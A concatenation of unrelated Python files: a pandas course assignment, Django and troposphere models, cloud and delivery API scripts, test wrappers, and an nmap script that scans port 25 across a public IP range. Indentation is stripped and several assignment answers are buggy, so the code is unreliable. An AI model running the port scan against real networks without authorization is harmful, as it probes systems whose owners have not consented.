from binance_f.constant.test import *
from binance_f.base.printobject import *
from binance_f.model.constant import *
import define
def getallorder ():
request_client = RequestClient(api_key=define.api_key, secret_key=define.secret_key)
result = request_client.get_open_orders()
return len(result)
|
# coding: utf-8
# ---
#
# _You are currently looking at **version 1.5** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-data-analysis/resources/0dhYG) course resource._
#
# ---
# # Assignment 3 - More Pandas
# This assignment requires more individual learning then the last one did - you are encouraged to check out the [pandas documentation](http://pandas.pydata.org/pandas-docs/stable/) to find functions or methods you might not have used yet, or ask questions on [Stack Overflow](http://stackoverflow.com/) and tag them as pandas and python related. And of course, the discussion forums are open for interaction with your peers and the course staff.
# ### Question 1 (20%)
# Load the energy data from the file `Energy Indicators.xls`, which is a list of indicators of [energy supply and renewable electricity production](Energy%20Indicators.xls) from the [United Nations](http://unstats.un.org/unsd/environment/excel_file_tables/2013/Energy%20Indicators.xls) for the year 2013, and should be put into a DataFrame with the variable name of **energy**.
#
# Keep in mind that this is an Excel file, and not a comma separated values file. Also, make sure to exclude the footer and header information from the datafile. The first two columns are unneccessary, so you should get rid of them, and you should change the column labels so that the columns are:
#
# `['Country', 'Energy Supply', 'Energy Supply per Capita', '% Renewable']`
#
# Convert `Energy Supply` to gigajoules (there are 1,000,000 gigajoules in a petajoule). For all countries which have missing data (e.g. data with "...") make sure this is reflected as `np.NaN` values.
#
# Rename the following list of countries (for use in later questions):
#
# ```"Republic of Korea": "South Korea",
# "United States of America": "United States",
# "United Kingdom of Great Britain and Northern Ireland": "United Kingdom",
# "China, Hong Kong Special Administrative Region": "Hong Kong"```
#
# There are also several countries with numbers and/or parenthesis in their name. Be sure to remove these,
#
# e.g.
#
# `'Bolivia (Plurinational State of)'` should be `'Bolivia'`,
#
# `'Switzerland17'` should be `'Switzerland'`.
#
# <br>
#
# Next, load the GDP data from the file `world_bank.csv`, which is a csv containing countries' GDP from 1960 to 2015 from [World Bank](http://data.worldbank.org/indicator/NY.GDP.MKTP.CD). Call this DataFrame **GDP**.
#
# Make sure to skip the header, and rename the following list of countries:
#
# ```"Korea, Rep.": "South Korea",
# "Iran, Islamic Rep.": "Iran",
# "Hong Kong SAR, China": "Hong Kong"```
#
# <br>
#
# Finally, load the [Sciamgo Journal and Country Rank data for Energy Engineering and Power Technology](http://www.scimagojr.com/countryrank.php?category=2102) from the file `scimagojr-3.xlsx`, which ranks countries based on their journal contributions in the aforementioned area. Call this DataFrame **ScimEn**.
#
# Join the three datasets: GDP, Energy, and ScimEn into a new dataset (using the intersection of country names). Use only the last 10 years (2006-2015) of GDP data and only the top 15 countries by Scimagojr 'Rank' (Rank 1 through 15).
#
# The index of this DataFrame should be the name of the country, and the columns should be ['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations',
# 'Citations per document', 'H index', 'Energy Supply',
# 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008',
# '2009', '2010', '2011', '2012', '2013', '2014', '2015'].
#
# *This function should return a DataFrame with 20 columns and 15 entries.*
# In[90]:
import pandas as pd
import numpy as np
# Load the energy data from the file Energy Indicators.xls
energy = pd.read_excel('Energy Indicators.xls')
# make sure to exclude the footer and header information from the datafile
energy = energy[16:243]
# The first two columns are unneccessary, so you should get rid of them
energy = energy.drop(energy.columns[[0, 1]], axis=1)
# so that the columns are:['Country', 'Energy Supply', 'Energy Supply per Capita', '% Renewable']
energy.rename(columns={'Environmental Indicators: Energy': 'Country','Unnamed: 3':'Energy Supply','Unnamed: 4':'Energy Supply per Capita','Unnamed: 5':'% Renewable'}, inplace=True)
energy.replace('...', np.nan,inplace = True)
# Convert Energy Supply to gigajoules (there are 1,000,000 gigajoules in a petajoule)
energy['Energy Supply'] = energy['Energy Supply']*1000000
def remove(data):
cleardata = ''.join([i for i in data if not i.isdigit()])
i = cleardata.find('(')
if i>-1:
cleardata = cleardata[:i]
return cleardata.strip()
energy['Country'] = energy['Country'].apply(remove)
# Rename the following list of countries
rename = {"Republic of Korea": "South Korea",
"United States of America": "United States",
"United Kingdom of Great Britain and Northern Ireland": "United Kingdom",
"China, Hong Kong Special Administrative Region": "Hong Kong"}
energy.replace({"Country": rename},inplace = True)
GDP = pd.read_csv('world_bank.csv', skiprows=4)
di = {"Korea, Rep.": "South Korea",
"Iran, Islamic Rep.": "Iran",
"Hong Kong SAR, China": "Hong Kong"}
GDP.replace({"Country Name": di},inplace = True)
GDP.rename(columns={'Country Name': 'Country'}, inplace=True)
ScimEn = pd.read_excel('scimagojr-3.xlsx')
df = pd.merge(pd.merge(energy, GDP, on='Country'), ScimEn, on='Country')
df
df.set_index('Country',inplace=True)
# The index of this DataFrame should be the name of the country, and the columns should be ['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations', 'Citations per document', 'H index', 'Energy Supply', 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015'].
df = df[['Rank', 'Documents', 'Citable documents', 'Citations', 'Self-citations', 'Citations per document', 'H index', 'Energy Supply', 'Energy Supply per Capita', '% Renewable', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015']]
df.sort('Rank',inplace=True)
# df = (df.loc[df['Rank'].isin([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15])])
df[:15]
# In[50]:
def answer_one():
return df[:15]
# ### Question 2 (6.6%)
# The previous question joined three datasets then reduced this to just the top 15 entries. When you joined the datasets, but before you reduced this to the top 15 items, how many entries did you lose?
#
# *This function should return a single number.*
# In[5]:
get_ipython().run_cell_magic('HTML', '', '<svg width="800" height="300">\n <circle cx="150" cy="180" r="80" fill-opacity="0.2" stroke="black" stroke-width="2" fill="blue" />\n <circle cx="200" cy="100" r="80" fill-opacity="0.2" stroke="black" stroke-width="2" fill="red" />\n <circle cx="100" cy="100" r="80" fill-opacity="0.2" stroke="black" stroke-width="2" fill="green" />\n <line x1="150" y1="125" x2="300" y2="150" stroke="black" stroke-width="2" fill="black" stroke-dasharray="5,3"/>\n <text x="300" y="165" font-family="Verdana" font-size="35">Everything but this!</text>\n</svg>')
# In[36]:
def answer_two():
# Union A, B, C - Intersection A, B, C
union = pd.merge(pd.merge(energy, GDP, on='Country', how='outer'), ScimEn, on='Country', how='outer')
intersect = pd.merge(pd.merge(energy, GDP, on='Country'), ScimEn, on='Country')
answer_two = len(union)-len(intersect)
return answer_two
# ## Answer the following questions in the context of only the top 15 countries by Scimagojr Rank (aka the DataFrame returned by `answer_one()`)
# ### Question 3 (6.6%)
# What is the average GDP over the last 10 years for each country? (exclude missing values from this calculation.)
#
# *This function should return a Series named `avgGDP` with 15 countries and their average GDP sorted in descending order.*
# In[8]:
def answer_three():
Top15 = answer_one()
years = ['2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015']
avg = (Top15[years].mean(axis=1)).sort_values(ascending=False).rename('avgGDP')
return avg
# ### Question 4 (6.6%)
# By how much had the GDP changed over the 10 year span for the country with the 6th largest average GDP?
#
# *This function should return a single number.*
# In[9]:
def answer_four():
Top15 = answer_one()
Top15['avgGDP'] = answer_three()
Top15.sort_values(by='avgGDP', inplace=True, ascending=False)
change = Top15.iloc[5]['2015']-Top15.iloc[5]['2006']
return abs(change)
# ### Question 5 (6.6%)
# What is the mean `Energy Supply per Capita`?
#
# *This function should return a single number.*
# In[37]:
def answer_five():
Top15 = answer_one()
return Top15['Energy Supply per Capita'].mean()
# ### Question 6 (6.6%)
# What country has the maximum % Renewable and what is the percentage?
#
# *This function should return a tuple with the name of the country and the percentage.*
# In[38]:
def answer_six():
Top15 = answer_one()
ct = Top15.sort_values(by='% Renewable', ascending=False)
ct = ct.iloc[0]
return (ct.name, ct['% Renewable'])
# ### Question 7 (6.6%)
# Create a new column that is the ratio of Self-Citations to Total Citations.
# What is the maximum value for this new column, and what country has the highest ratio?
#
# *This function should return a tuple with the name of the country and the ratio.*
# In[39]:
def answer_seven():
Top15 = answer_one()
Top15['Citation_ratio'] = Top15['Self-citations']/Top15['Citations']
ct = Top15.sort_values(by='Citation_ratio', ascending=False)
ct = ct.iloc[0]
return ct.name, ct['Citation_ratio']
# ### Question 8 (6.6%)
#
# Create a column that estimates the population using Energy Supply and Energy Supply per capita.
# What is the third most populous country according to this estimate?
#
# *This function should return a single string value.*
# In[13]:
def answer_eight():
Top15 = answer_one()
Top15['Population'] = Top15['Energy Supply']/Top15['Energy Supply per Capita']
return Top15.sort_values(by='Population', ascending=False).iloc[2].name
# ### Question 9 (6.6%)
# Create a column that estimates the number of citable documents per person.
# What is the correlation between the number of citable documents per capita and the energy supply per capita? Use the `.corr()` method, (Pearson's correlation).
#
# *This function should return a single number.*
#
# *(Optional: Use the built-in function `plot9()` to visualize the relationship between Energy Supply per Capita vs. Citable docs per Capita)*
# In[40]:
def answer_nine():
Top15 = answer_one()
Top15['Population'] = Top15['Energy Supply'] / Top15['Energy Supply per Capita']
Top15['avg'] = Top15['Citable documents'] / Top15['Population']
return Top15[['Energy Supply per Capita', 'avg']].corr().ix['Energy Supply per Capita', 'avg']
# In[41]:
def plot9():
import matplotlib as plt
get_ipython().magic('matplotlib inline')
Top15 = answer_one()
Top15['PopEst'] = Top15['Energy Supply'] / Top15['Energy Supply per Capita']
Top15['Citable docs per Capita'] = Top15['Citable documents'] / Top15['PopEst']
Top15.plot(x='Citable docs per Capita', y='Energy Supply per Capita', kind='scatter', xlim=[0, 0.0006])
# In[ ]:
#plot9() # Be sure to comment out plot9() before submitting the assignment!
# ### Question 10 (6.6%)
# Create a new column with a 1 if the country's % Renewable value is at or above the median for all countries in the top 15, and a 0 if the country's % Renewable value is below the median.
#
# *This function should return a series named `HighRenew` whose index is the country name sorted in ascending order of rank.*
# In[18]:
def answer_ten():
Top15 = answer_one()
med = Top15['% Renewable'].median()
Top15['Above'] = Top15['% Renewable']>=med
Top15['Above'] = Top15['HighRenew'].apply(lambda x:1 if x else 0)
Top15.sort_values(by='Rank', inplace=True)
return Top15['Above']
# ### Question 11 (6.6%)
# Use the following dictionary to group the Countries by Continent, then create a dateframe that displays the sample size (the number of countries in each continent bin), and the sum, mean, and std deviation for the estimated population of each country.
#
# ```python
# ContinentDict = {'China':'Asia',
# 'United States':'North America',
# 'Japan':'Asia',
# 'United Kingdom':'Europe',
# 'Russian Federation':'Europe',
# 'Canada':'North America',
# 'Germany':'Europe',
# 'India':'Asia',
# 'France':'Europe',
# 'South Korea':'Asia',
# 'Italy':'Europe',
# 'Spain':'Europe',
# 'Iran':'Asia',
# 'Australia':'Australia',
# 'Brazil':'South America'}
# ```
#
# *This function should return a DataFrame with index named Continent `['Asia', 'Australia', 'Europe', 'North America', 'South America']` and columns `['size', 'sum', 'mean', 'std']`*
# In[42]:
def answer_eleven():
Top15 = answer_one()
ContinentDict = {'China':'Asia',
'United States':'North America',
'Japan':'Asia',
'United Kingdom':'Europe',
'Russian Federation':'Europe',
'Canada':'North America',
'Germany':'Europe',
'India':'Asia',
'France':'Europe',
'South Korea':'Asia',
'Italy':'Europe',
'Spain':'Europe',
'Iran':'Asia',
'Australia':'Australia',
'Brazil':'South America'}
groups = pd.DataFrame(columns = ['size', 'sum', 'mean', 'std'])
Top15['Population'] = Top15['Energy Supply'] / Top15['Energy Supply per Capita']
for group, frame in Top15.groupby(ContinentDict):
groups.loc[group] = [len(frame), frame['Population'].sum(),frame['Population'].mean(),frame['Population'].std()]
return groups
# ### Question 12 (6.6%)
# Cut % Renewable into 5 bins. Group Top15 by the Continent, as well as these new % Renewable bins. How many countries are in each of these groups?
#
# *This function should return a __Series__ with a MultiIndex of `Continent`, then the bins for `% Renewable`. Do not include groups with no countries.*
# In[45]:
def answer_twelve():
Top15 = answer_one()
ContinentDict = {'China':'Asia',
'United States':'North America',
'Japan':'Asia',
'United Kingdom':'Europe',
'Russian Federation':'Europe',
'Canada':'North America',
'Germany':'Europe',
'India':'Asia',
'France':'Europe',
'South Korea':'Asia',
'Italy':'Europe',
'Spain':'Europe',
'Iran':'Asia',
'Australia':'Australia',
'Brazil':'South America'}
Top15 = Top15.reset_index()
Top15['Continent'] = [ContinentDict[country] for country in Top15['Country']]
return Top15.groupby(['Continent']).size()
# ### Question 13 (6.6%)
# Convert the Population Estimate series to a string with thousands separator (using commas). Do not round the results.
#
# e.g. 317615384.61538464 -> 317,615,384.61538464
#
# *This function should return a Series `PopEst` whose index is the country name and whose values are the population estimate string.*
# In[43]:
def answer_thirteen():
Top15 = answer_one()
Top15['PopEst'] = (Top15['Energy Supply'] / Top15['Energy Supply per Capita']).astype(float)
return Top15
# ### Optional
#
# Use the built in function `plot_optional()` to see an example visualization.
# In[23]:
def plot_optional():
import matplotlib as plt
get_ipython().magic('matplotlib inline')
Top15 = answer_one()
ax = Top15.plot(x='Rank', y='% Renewable', kind='scatter',
c=['#e41a1c','#377eb8','#e41a1c','#4daf4a','#4daf4a','#377eb8','#4daf4a','#e41a1c',
'#4daf4a','#e41a1c','#4daf4a','#4daf4a','#e41a1c','#dede00','#ff7f00'],
xticks=range(1,16), s=6*Top15['2014']/10**10, alpha=.75, figsize=[16,6]);
for i, txt in enumerate(Top15.index):
ax.annotate(txt, [Top15['Rank'][i], Top15['% Renewable'][i]], ha='center')
print("This is an example of a visualization that can be created to help understand the data. This is a bubble chart showing % Renewable vs. Rank. The size of the bubble corresponds to the countries' 2014 GDP, and the color corresponds to the continent.")
# In[ ]:
#plot_optional() # Be sure to comment out plot_optional() before submitting the assignment!
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from ahead.utils.db import DateTimeModel
SECTION_MODULE_CHOICES = (('article', '文章列表'), ('simple', '单页面'))
# class Foundation(DateTimeModel):
# pass
# class module(DateTimeModel):
# name = models.CharField('模块名称', max_length=255, unique=True)
# title = models.CharField('英文标题', max_length=255, unique=True)
class Section(DateTimeModel):
name = models.CharField('栏目名称', max_length=255, unique=True)
title = models.CharField('英文标题', max_length=255, unique=True)
module = models.CharField('选择模型', max_length=255, choices=SECTION_MODULE_CHOICES)
order = models.PositiveIntegerField('排序', default=99)
class Meta:
ordering = ['created_at']
class Article(DateTimeModel):
title = models.CharField('文章标题', max_length=255)
section = models.ForeignKey(Section)
img = models.CharField('缩略图', max_length=255, null=True, blank=True)
context = models.TextField('正文')
class Meta:
ordering = ['-created_at']
class Simple(DateTimeModel):
title = models.CharField('文章标题', max_length=255)
section = models.ForeignKey(Section)
context = models.TextField('正文')
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 43.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import integer
class AutoSnapshotAddOn(AWSProperty):
props = {
"SnapshotTimeOfDay": (str, False),
}
class AddOn(AWSProperty):
props = {
"AddOnType": (str, True),
"AutoSnapshotAddOnRequest": (AutoSnapshotAddOn, False),
"Status": (str, False),
}
class Disk(AWSObject):
resource_type = "AWS::Lightsail::Disk"
props = {
"AddOns": ([AddOn], False),
"AvailabilityZone": (str, False),
"DiskName": (str, True),
"SizeInGb": (integer, True),
"Tags": (Tags, False),
}
class Hardware(AWSProperty):
props = {
"CpuCount": (integer, False),
"Disks": ([Disk], False),
"RamSizeInGb": (integer, False),
}
class Location(AWSProperty):
props = {
"AvailabilityZone": (str, False),
"RegionName": (str, False),
}
class Port(AWSProperty):
props = {
"AccessDirection": (str, False),
"AccessFrom": (str, False),
"AccessType": (str, False),
"CidrListAliases": ([str], False),
"Cidrs": ([str], False),
"CommonName": (str, False),
"FromPort": (integer, False),
"Ipv6Cidrs": ([str], False),
"Protocol": (str, False),
"ToPort": (integer, False),
}
class Networking(AWSProperty):
props = {
"MonthlyTransfer": (dict, False),
"Ports": ([Port], True),
}
class State(AWSProperty):
props = {
"Code": (integer, False),
"Name": (str, False),
}
class Instance(AWSObject):
resource_type = "AWS::Lightsail::Instance"
props = {
"AddOns": ([AddOn], False),
"AvailabilityZone": (str, False),
"BlueprintId": (str, True),
"BundleId": (str, True),
"Hardware": (Hardware, False),
"InstanceName": (str, True),
"Location": (Location, False),
"Networking": (Networking, False),
"State": (State, False),
"Tags": (Tags, False),
}
|
class Solution:
def allPossibleFBT(self, n: int) -> List[TreeNode]:
if n % 2 == 0:
return []
if n == 1:
return [TreeNode()]
res = []
for i in range(1, n, 2):
left = self.allPossibleFBT(i)
right = self.allPossibleFBT(n - i - 1)
for l in left:
for r in right:
root = TreeNode(0, l, r)
res.append(root)
return res
|
import nmap
from prettytable import PrettyTable
# scan network - dispaly all opened ports in given range
nm = nmap.PortScanner()
nm.scan('156.17.40.1-255', '25')
tab = PrettyTable(["IP address", "Protocol", "Port", "Product name",
"Version", "Extra info"])
for host in nm.all_hosts():
for proto in nm[host].all_protocols():
lport = nm[host][proto].keys()
lport.sort()
for port in lport:
# incompatible with installed nmap version
if not isinstance(port, int):
continue
item = nm[host][proto][port]
# skip closed
if not item['state'] == "open":
continue
tab.add_row([host, proto, port, item['product'], item['version'],
item['extrainfo']])
print tab
|
from numpy import genfromtxt
import numpy as np
vector_file = "/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/feature_vectors.csv"
weight_file = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/weight.csv'
weighted_vector = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/weighted_vectors.csv'
sample_file = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/sample_feature_vectors.csv'
weighted_sample = '/Users/mengqizhou/Desktop/datamining/programing3/data/initialdata/weighted_sample.csv'
'''
for i in range(0,l):
count.append(0)
for vector in vectors:
for j in range(0, l):
if vector[j]==1:
count[j]+=1
weight = []
for i in range(0,l):
weight.append(float(691)/math.sqrt(float(count[i]))
print weight
np.savetxt(weight_file, weight, '%5.2f',delimiter=",")
'''
vectors = genfromtxt(sample_file, dtype=float,delimiter = ',')
vectors = np.array(vectors)
weights =genfromtxt(weight_file, dtype=float,delimiter = ',')
weights = np.array(weights)
'''
weight = []
for item in weights:
weight.append(math.sqrt(float(item)))
'''
new = np.multiply(vectors, weights)
print len(new), len(new[0])
np.savetxt(weighted_sample, new, '%5.2f',delimiter=",")
|
import os
from random import randrange
import time
import uuid
from novaclient.client import Client
import paramiko
import sys
if len(sys.argv) < 2:
print "WRONG INPUT!"
print "Usage: python create_instance.py <number_of_workers>"
sys.exit(0)
else:
NR_OF_WORKERS = int(sys.argv[1])
print "Creating " + str(NR_OF_WORKERS) + " instances"
config = {'username':os.environ['OS_USERNAME'],
'api_key':os.environ['OS_PASSWORD'],
'project_id':os.environ['OS_TENANT_NAME'],
'auth_url':os.environ['OS_AUTH_URL'],
}
nova = Client('2',**config)
floating_ips = []
def init(i_name):
instancename = "dj_worker_%i" %(i_name)
if not nova.keypairs.findall(name="Svensskey"):
with open(os.path.expanduser('svensskey.pem')) as fpubkey:
nova.keypairs.create(name="Svensskey", public_key=fpubkey.read())
#image = nova.images.find(name="Ubuntu Server 14.04 LTS (Trusty Tahr)")
image = nova.images.find(id='59a19f79-f906-44e0-964a-22d66558cc54')
flavor = nova.flavors.find(name="m1.medium")
user_data = open('userdata_worker.yml', 'r')
instance = nova.servers.create(name=instancename, image=image, flavor=flavor, key_name="Svensskey", userdata=user_data)
user_data.close()
# Poll at 5 second intervals, until the status is no longer 'BUILD'
status = instance.status
while status == 'BUILD':
time.sleep(5)
# Retrieve the instance again so the status field updates
instance = nova.servers.get(instance.id)
status = instance.status
print "status: %s" % status
secgroup = nova.security_groups.find(name="default")
try:
nova.security_group_rules.create(secgroup.id,
ip_protocol="tcp",
from_port=5001,
to_port=5001)
except Exception as e:
pass
# Assign Floating IP
iplist = nova.floating_ips.list()
random_index = randrange(0,len(iplist))
for ip_obj in iplist:
if (getattr(ip_obj, 'instance_id') == None):
floating_ip = getattr(ip_obj, 'ip')
break
else:
print "NO IPS FOUND...CREATING ONE"
new_ip = nova.floating_ips.create(getattr(nova.floating_ip_pools.list()[0],'name'))
floating_ip = getattr(new_ip, 'ip')
print "Created IP: " +str(floating_ip)
try:
instance.add_floating_ip(floating_ip)
print "Attaching IP: " + str(floating_ip)
return floating_ip
except Exception as e:
print e
print "XXXXXXXXXX Failed to attach ip! XXXXXXXXXXX"
for i in range(0,NR_OF_WORKERS):
init(i)
# wait_time = 260
# for i in range(0,26):
# time.sleep(10)
# wait_time -= 10
# print str(wait_time)+"s remaining..."
# for ip in floating_ips:
# ssh = paramiko.SSHClient()
# ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# cmd = "cd /home/ubuntu/acc_project; celery worker -l info -A airfoil &"
# sshkey = paramiko.RSAKey.from_private_key_file('/Users/admin/Desktop/acc/lab3/svensskey.pem')
# try:
# ssh.connect(str(ip),username="ubuntu",pkey=sshkey)
# print "CONNECTED!"
# stdin, stdout, stderr = ssh.exec_command(cmd)
# print "running cmd " + str(cmd)
# except Exception as e:
# print e
# print "ERRROR SSHING!!!!!!"
# ssh.close()
|
HTML_SPACE = ' '
def prefill_with_character(value, column_length=4, fill_char=HTML_SPACE):
"""Prepend value with fill_char for given column_length"""
str_val = str(value)
fill_length = column_length - len(str_val)
return fill_char*fill_length + str_val
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from pycdek import AbstractOrder, AbstractOrderLine, Client
class Product(models.Model):
title = models.CharField('Название', max_length=255)
weight = models.PositiveIntegerField('Вес, гр.')
price = models.DecimalField('Цена', max_digits=12, decimal_places=2)
class Order(AbstractOrder, models.Model):
sender_city_id = 44 # Если отправляем всегда из Москвы
sender_city_postcode = models.PositiveIntegerField()
recipient_name = models.CharField('Имя получателя', max_length=100)
recipient_phone = models.CharField('Телефон', max_length=20)
recipient_city_id = models.PositiveIntegerField()
recipient_city_postcode = models.PositiveIntegerField()
recipient_address_street = models.CharField('Улица', max_length=100, null=True, blank=True)
recipient_address_house = models.PositiveIntegerField('Номер дома', max_length=100, null=True, blank=True)
recipient_address_flat = models.PositiveIntegerField('Номер квартиры', max_length=100, null=True, blank=True)
pvz_code = models.CharField('Код пункта самовывоза', max_length=10, null=True, blank=True)
shipping_tariff = models.PositiveIntegerField('Тариф доставки')
shipping_price = models.DecimalField('Стоимость доставки', max_digits=12, decimal_places=2, default=0)
comment = models.TextField('Комментарий', blank=True)
is_paid = models.BooleanField('Заказ оплачен', default=False)
def get_number(self):
return self.id
def get_products(self):
return self.lines.all()
def get_comment(self):
return self.comment
class OrderLine(AbstractOrderLine, models.Model):
order = models.ForeignKey(Order, related_name='lines')
product = models.ForeignKey(Product)
quantity = models.PositiveIntegerField('Количество', default=1)
def get_product_title(self):
return self.product.title
def get_product_upc(self):
return self.product.id
def get_product_weight(self):
return self.product.weight
def get_quantity(self):
return self.quantity
def get_product_price(self):
return self.product.price
def get_product_payment(self):
if self.order.is_paid:
return 0
else:
return self.product.price # оплата при получении
client = Client('login', 'password')
product = Product.objects.create(title='Шлакоблок', weight=1000, price=500)
# заказ в Новосибирск с самовывозом
Order.objects.create(
recipient_name='Иванов Иван Иванович',
recipient_phone='+7 (999) 999-99-99',
recipient_city_id=270, # Новосибирск
recipient_city_postcode=630066, # Новосибирск
shipping_tariff=137, # самовывоз
is_paid=True
)
# заказ в Санкт-Петербург с курьерской доставкой и оплатой при получении
order = Order.objects.create(
recipient_name='Иванов Иван Иванович',
recipient_phone='+7 (999) 999-99-99',
recipient_city_id=137, # Санкт-Петербург
recipient_city_postcode=198261, # Санкт-Петербург
recipient_address_street='пр. Ленина',
recipient_address_house=1,
recipient_address_flat=1,
shipping_tariff=136, # доставка курьером
comment='Позвонить за час'
)
OrderLine.objects.create(product=product, order=order)
# создание заказа
response = client.create_order(order)
dispatch_number = response['DispatchNumber']
# получение накладной к заказу
with open('Заказ #%s.pdf' % order.get_number(), 'wb') as f:
data = client.get_orders_print([dispatch_number])
f.write(data)
# отслеживание статуса доставки заказа
client.get_orders_statuses([dispatch_number])
# получение информации о заказе
client.get_orders_info([dispatch_number])
# удаление (отмена) заказа
client.delete_order(order)
|
from common.run_method import RunMethod
import allure
@allure.step("极客数学帮(家长APP)/订单/计算订单总价(旧)")
def app_order_countOrderPrice_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/计算订单总价(旧)"
url = f"/service-order/app/order/countOrderPrice"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("通用/报名/app端获取可使用优惠及优惠券")
def app_order_queryMatchDiscountAndCoupon_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "通用/报名/app端获取可使用优惠及优惠券"
url = f"/service-order/app/order/queryMatchDiscountAndCoupon"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/计算订单总价")
def app_order_calculateOrderPrice_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/计算订单总价"
url = f"/service-order/app/order/calculateOrderPrice"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/新增订单")
def app_order_saveOrder_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/新增订单"
url = f"/service-order/app/order/saveOrder"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/订单")
def app_order_queryOrderGeneralForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/订单"
url = f"/service-order/app/order/queryOrderGeneralForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/订单/查询订单详情")
def app_order_queryOrderDetailForApp_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/订单/查询订单详情"
url = f"/service-order/app/order/queryOrderDetailForApp"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/我的/优惠券/根据优惠券查询学生可报名班级")
def app_coupon_couponForAppClasses_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/我的/优惠券/根据优惠券查询学生可报名班级"
url = f"/service-order/app/coupon/couponForAppClasses"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/报名/app端下单前的预验证")
def app_order_preValidOrderCondition_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/报名/app端下单前的预验证"
url = f"/service-order/app/order/preValidOrderCondition"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/查询订单状态")
def app_order_queryStatus_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/查询订单状态"
url = f"/service-order/app/order/queryStatus"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/释放座位")
def app_order_cancle_seat_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极客数学帮(家长APP)/订单/释放座位"
url = f"/service-order/app/order/cancle/seat"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极客数学帮(家长APP)/订单/验证学生重复生成订单")
def app_order_studentHasOrder_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
